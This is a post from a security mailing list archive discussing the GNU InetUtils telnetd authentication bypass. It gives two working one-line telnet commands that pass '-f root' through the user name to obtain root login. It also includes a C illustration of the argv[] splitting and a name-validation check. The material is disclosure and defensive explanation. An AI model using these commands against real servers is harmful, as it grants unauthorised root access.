oss-sec mailing list archives
Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd
From: Paul Ducklin <pducklin () outlook com>
Date: Wed, 28 Jan 2026 20:57:46 +0000
USER='-f root' telnet -a localhost
Seems that the same code path results from the even simpler incantation:

$ telnet -l 'root -f' server.test

The user-name-with-a-space-in-it doesn't get passed as a single argument to execv(), but "helpfully" gets split back into two parts and passed to execv() as two separate entries in argv[] :-)

Q. "Hey, if we call execv() directly, we'll avoid some of the risks associated with shell-style command line processing. How good is that?"

A. "Hold my beer."

TELNET, eh? From the days when RFCs still had just three digits...
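The argv[] splitting described in the message above, as an added example that is not part of the original post and is not the InetUtils code: a simplified model that pastes the user name into a login command line and splits the result on whitespace, next to a validation check that rejects such names before they reach the command line. The command template, the host name client.test and the function names are assumptions made for illustration.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#define MAX_ARGS 16

/* Simplified model (assumption): split an expanded command line on blanks
   to build the argv[] later handed to execv(). No shell is involved. */
static int split_argv(char *line, char *argv[], int max)
{
    int argc = 0;
    char *p = line;
    while (*p && argc < max - 1) {
        while (*p == ' ' || *p == '\t') p++;        /* skip separators */
        if (!*p) break;
        argv[argc++] = p;                           /* start of a word */
        while (*p && *p != ' ' && *p != '\t') p++;
        if (*p) *p++ = '\0';                        /* terminate the word */
    }
    argv[argc] = NULL;
    return argc;
}

/* Weak pattern: the remote-supplied name is pasted in before splitting. */
int build_login_argv(const char *user, char *buf, size_t len, char *argv[])
{
    int n = snprintf(buf, len, "/bin/login -p -h client.test %s", user);
    if (n < 0 || (size_t)n >= len) return -1;       /* truncated: refuse */
    return split_argv(buf, argv, MAX_ARGS);
}

/* Hardened check: a name may not start with '-' or contain a separator. */
int user_name_ok(const char *user)
{
    if (user[0] == '\0' || user[0] == '-') return 0;
    for (const char *p = user; *p; p++)
        if (!isalnum((unsigned char)*p) && !strchr("_.-", *p))
            return 0;
    return 1;
}

int main(void)
{
    const char *samples[] = { "alice", "root -f", "-f root" }; /* constructed */
    for (size_t i = 0; i < 3; i++) {
        char buf[128], *argv[MAX_ARGS];
        int argc = build_login_argv(samples[i], buf, sizeof buf, argv);
        printf("%-8s argc=%d ok=%d\n", samples[i], argc, user_name_ok(samples[i]));
    }
    return 0;
}
```

Both constructed names from the thread produce one more argv[] entry than "alice" does, and user_name_ok() rejects both.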
Current thread:
- GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Simon Josefsson (Jan 20)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Alexander Bochmann (Jan 20)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Jakub Wilk (Jan 21)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Christian Fischer (Jan 22)
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Demi Marie Obenour (Jan 22)
- <Possible follow-ups>
- Re: GNU InetUtils Security Advisory: remote authentication by-pass in telnetd Paul Ducklin (Jan 28)
